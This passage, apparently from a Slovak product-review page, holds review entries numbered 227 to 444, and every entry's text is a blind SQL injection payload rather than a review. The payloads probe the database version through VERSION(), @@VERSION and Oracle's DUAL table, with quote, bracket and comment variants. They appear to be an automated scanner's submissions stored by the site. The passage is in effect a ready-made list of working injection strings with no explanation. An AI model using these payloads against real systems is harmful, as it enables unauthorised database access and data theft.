 227. Smith"OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1--
  Recenzované dňa

  3

 228. Smith"OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255--
  Recenzované dňa

  3

 229. Smith"OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 230. Smith"OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0--
  Recenzované dňa

  3

 231. Smith'OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
  Recenzované dňa

  3

 232. Smith'OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
  Recenzované dňa

  3

 233. Smith'OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
  Recenzované dňa

  3

 234. Smith'OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 235. Smith'OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
  Recenzované dňa

  3

 236. Smith'OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25--
  Recenzované dňa

  3

 237. Smith'OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1--
  Recenzované dňa

  3

 238. Smith'OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255--
  Recenzované dňa

  3

 239. Smith'OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 240. Smith'OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0--
  Recenzované dňa

  3

 241. Smith" AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
  Recenzované dňa

  3

 242. Smith" AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1
  Recenzované dňa

  3

 243. Smith" AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
  Recenzované dňa

  3

 244. Smith" AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 245. Smith" AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
  Recenzované dňa

  3

 246. Smith" AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25--
  Recenzované dňa

  3

 247. Smith" AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1--
  Recenzované dňa

  3

 248. Smith" AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255--
  Recenzované dňa

  3

 249. Smith" AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 250. Smith" AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0--
  Recenzované dňa

  3

 251. Smith' AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
  Recenzované dňa

  3

 252. Smith' AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1
  Recenzované dňa

  3

 253. Smith' AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
  Recenzované dňa

  3

 254. Smith' AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 255. Smith' AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
  Recenzované dňa

  3

 256. Smith' AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25--
  Recenzované dňa

  3

 257. Smith' AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1--
  Recenzované dňa

  3

 258. Smith' AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255--
  Recenzované dňa

  3

 259. Smith' AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 260. Smith' AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0--
  Recenzované dňa

  3

 261. -1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
  Recenzované dňa

  3

 262. -1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1
  Recenzované dňa

  3

 263. -1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
  Recenzované dňa

  3

 264. -1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 265. -1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
  Recenzované dňa

  3

 266. -1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25--
  Recenzované dňa

  3

 267. -1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1--
  Recenzované dňa

  3

 268. -1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255--
  Recenzované dňa

  3

 269. -1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 270. -1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0--
  Recenzované dňa

  3

 271. -1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
  Recenzované dňa

  3

 272. -1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1
  Recenzované dňa

  3

 273. -1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
  Recenzované dňa

  3

 274. -1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 275. -1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
  Recenzované dňa

  3

 276. -1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25--
  Recenzované dňa

  3

 277. -1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1--
  Recenzované dňa

  3

 278. -1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255--
  Recenzované dňa

  3

 279. -1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 280. -1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0--
  Recenzované dňa

  3

 281. Smith"OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
  Recenzované dňa

  3

 282. Smith"OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1
  Recenzované dňa

  3

 283. Smith"OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
  Recenzované dňa

  3

 284. Smith"OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 285. Smith"OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
  Recenzované dňa

  3

 286. Smith"OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25--
  Recenzované dňa

  3

 287. Smith"OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1--
  Recenzované dňa

  3

 288. Smith"OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255--
  Recenzované dňa

  3

 289. Smith"OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 290. Smith"OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0--
  Recenzované dňa

  3

 291. Smith'OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
  Recenzované dňa

  3

 292. Smith'OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1
  Recenzované dňa

  3

 293. Smith'OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
  Recenzované dňa

  3

 294. Smith'OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 295. Smith'OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
  Recenzované dňa

  3

 296. Smith'OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25--
  Recenzované dňa

  3

 297. Smith'OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1--
  Recenzované dňa

  3

 298. Smith'OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255--
  Recenzované dňa

  3

 299. Smith'OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 300. Smith'OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0--
  Recenzované dňa

  3

 301. -1 OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
  Recenzované dňa

  3

 302. -1 OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1
  Recenzované dňa

  3

 303. -1 OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
  Recenzované dňa

  3

 304. -1 OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 305. -1 OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
  Recenzované dňa

  3

 306. -1 OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25--
  Recenzované dňa

  3

 307. -1 OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1--
  Recenzované dňa

  3

 308. -1 OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255--
  Recenzované dňa

  3

 309. -1 OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 310. -1 OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0--
  Recenzované dňa

  3

 311. Smith"OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
  Recenzované dňa

  3

 312. Smith"OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1
  Recenzované dňa

  3

 313. Smith"OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
  Recenzované dňa

  3

 314. Smith"OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 315. Smith"OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
  Recenzované dňa

  3

 316. Smith"OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25--
  Recenzované dňa

  3

 317. Smith"OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1--
  Recenzované dňa

  3

 318. Smith"OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255--
  Recenzované dňa

  3

 319. Smith"OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 320. Smith"OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0--
  Recenzované dňa

  3

 321. Smith'OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
  Recenzované dňa

  3

 322. Smith'OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1
  Recenzované dňa

  3

 323. Smith'OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
  Recenzované dňa

  3

 324. Smith'OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 325. Smith'OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
  Recenzované dňa

  3

 326. Smith'OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25--
  Recenzované dňa

  3

 327. Smith'OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1--
  Recenzované dňa

  3

 328. Smith'OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255--
  Recenzované dňa

  3

 329. Smith'OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 330. Smith'OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0--
  Recenzované dňa

  3

 331. -1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
  Recenzované dňa

  3

 332. -1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1
  Recenzované dňa

  3

 333. -1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
  Recenzované dňa

  3

 334. -1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 335. -1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
  Recenzované dňa

  3

 336. -1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25--
  Recenzované dňa

  3

 337. -1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1--
  Recenzované dňa

  3

 338. -1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255--
  Recenzované dňa

  3

 339. -1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 340. -1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0--
  Recenzované dňa

  3

 341. Smith"OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
  Recenzované dňa

  3

 342. Smith"OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1
  Recenzované dňa

  3

 343. Smith"OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
  Recenzované dňa

  3

 344. Smith"OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 345. Smith"OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
  Recenzované dňa

  3

 346. Smith"OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25--
  Recenzované dňa

  3

 347. Smith"OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1--
  Recenzované dňa

  3

 348. Smith"OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255--
  Recenzované dňa

  3

 349. Smith"OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 350. Smith"OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0--
  Recenzované dňa

  3

 351. Smith'OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
  Recenzované dňa

  3

 352. Smith'OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1
  Recenzované dňa

  3

 353. Smith'OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
  Recenzované dňa

  3

 354. Smith'OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 355. Smith'OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
  Recenzované dňa

  3

 356. Smith'OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25--
  Recenzované dňa

  3

 357. Smith'OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1--
  Recenzované dňa

  3

 358. Smith'OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255--
  Recenzované dňa

  3

 359. Smith'OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)
  Recenzované dňa

  3

 360. Smith'OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0--
  Recenzované dňa

  3

 361. Smith" AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25
  Recenzované dňa

  3

 362. Smith" AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1
  Recenzované dňa

  3

 363. Smith" AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
  Recenzované dňa

  3

 364. Smith" AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 365. Smith" AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0
  Recenzované dňa

  3

 366. Smith" AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25--
  Recenzované dňa

  3

 367. Smith" AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1--
  Recenzované dňa

  3

 368. Smith" AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255--
  Recenzované dňa

  3

 369. Smith" AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 370. Smith" AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0--
  Recenzované dňa

  3

 371. Smith' AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25
  Recenzované dňa

  3

 372. Smith' AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1
  Recenzované dňa

  3

 373. Smith' AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
  Recenzované dňa

  3

 374. Smith' AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 375. Smith' AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0
  Recenzované dňa

  3

 376. Smith' AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25--
  Recenzované dňa

  3

 377. Smith' AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1--
  Recenzované dňa

  3

 378. Smith' AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255--
  Recenzované dňa

  3

 379. Smith' AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 380. Smith' AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0--
  Recenzované dňa

  3

 381. -1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25
  Recenzované dňa

  3

 382. -1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1
  Recenzované dňa

  3

 383. -1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
  Recenzované dňa

  3

 384. -1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 385. -1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0
  Recenzované dňa

  3

 386. -1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25--
  Recenzované dňa

  3

 387. -1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1--
  Recenzované dňa

  3

 388. -1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255--
  Recenzované dňa

  3

 389. -1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 390. -1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0--
  Recenzované dňa

  3

 391. -1 OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25
  Recenzované dňa

  3

 392. -1 OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1
  Recenzované dňa

  3

 393. -1 OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
  Recenzované dňa

  3

 394. -1 OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 395. -1 OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0
  Recenzované dňa

  3

 396. -1 OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25--
  Recenzované dňa

  3

 397. -1 OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1--
  Recenzované dňa

  3

 398. -1 OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255--
  Recenzované dňa

  3

 399. -1 OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 400. -1 OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0--
  Recenzované dňa

  3

 401. Smith"OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25
  Recenzované dňa

  3

 402. Smith"OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1
  Recenzované dňa

  3

 403. Smith"OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
  Recenzované dňa

  3

 404. Smith"OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 405. Smith"OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0
  Recenzované dňa

  3

 406. Smith"OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25--
  Recenzované dňa

  3

 407. Smith"OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1--
  Recenzované dňa

  3

 408. Smith"OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255--
  Recenzované dňa

  3

 409. Smith"OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 410. Smith"OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0--
  Recenzované dňa

  3

 411. Smith'OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25
  Recenzované dňa

  3

 412. Smith'OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1
  Recenzované dňa

  3

 413. Smith'OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
  Recenzované dňa

  3

 414. Smith'OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 415. Smith'OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0
  Recenzované dňa

  3

 416. Smith'OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25--
  Recenzované dňa

  3

 417. Smith'OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1--
  Recenzované dňa

  3

 418. Smith'OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255--
  Recenzované dňa

  3

 419. Smith'OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 420. Smith'OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0--
  Recenzované dňa

  3

 421. -1 OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25
  Recenzované dňa

  3

 422. -1 OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1
  Recenzované dňa

  3

 423. -1 OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
  Recenzované dňa

  3

 424. -1 OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 425. -1 OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0
  Recenzované dňa

  3

 426. -1 OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25--
  Recenzované dňa

  3

 427. -1 OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1--
  Recenzované dňa

  3

 428. -1 OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255--
  Recenzované dňa

  3

 429. -1 OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 430. -1 OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0--
  Recenzované dňa

  3

 431. Smith"OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25
  Recenzované dňa

  3

 432. Smith"OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1
  Recenzované dňa

  3

 433. Smith"OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
  Recenzované dňa

  3

 434. Smith"OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 435. Smith"OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0
  Recenzované dňa

  3

 436. Smith"OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25--
  Recenzované dňa

  3

 437. Smith"OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1--
  Recenzované dňa

  3

 438. Smith"OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255--
  Recenzované dňa

  3

 439. Smith"OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

 440. Smith"OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0--
  Recenzované dňa

  3

 441. Smith'OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25
  Recenzované dňa

  3

 442. Smith'OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1
  Recenzované dňa

  3

 443. Smith'OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
  Recenzované dňa

  3

 444. Smith'OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)
  Recenzované dňa

  3

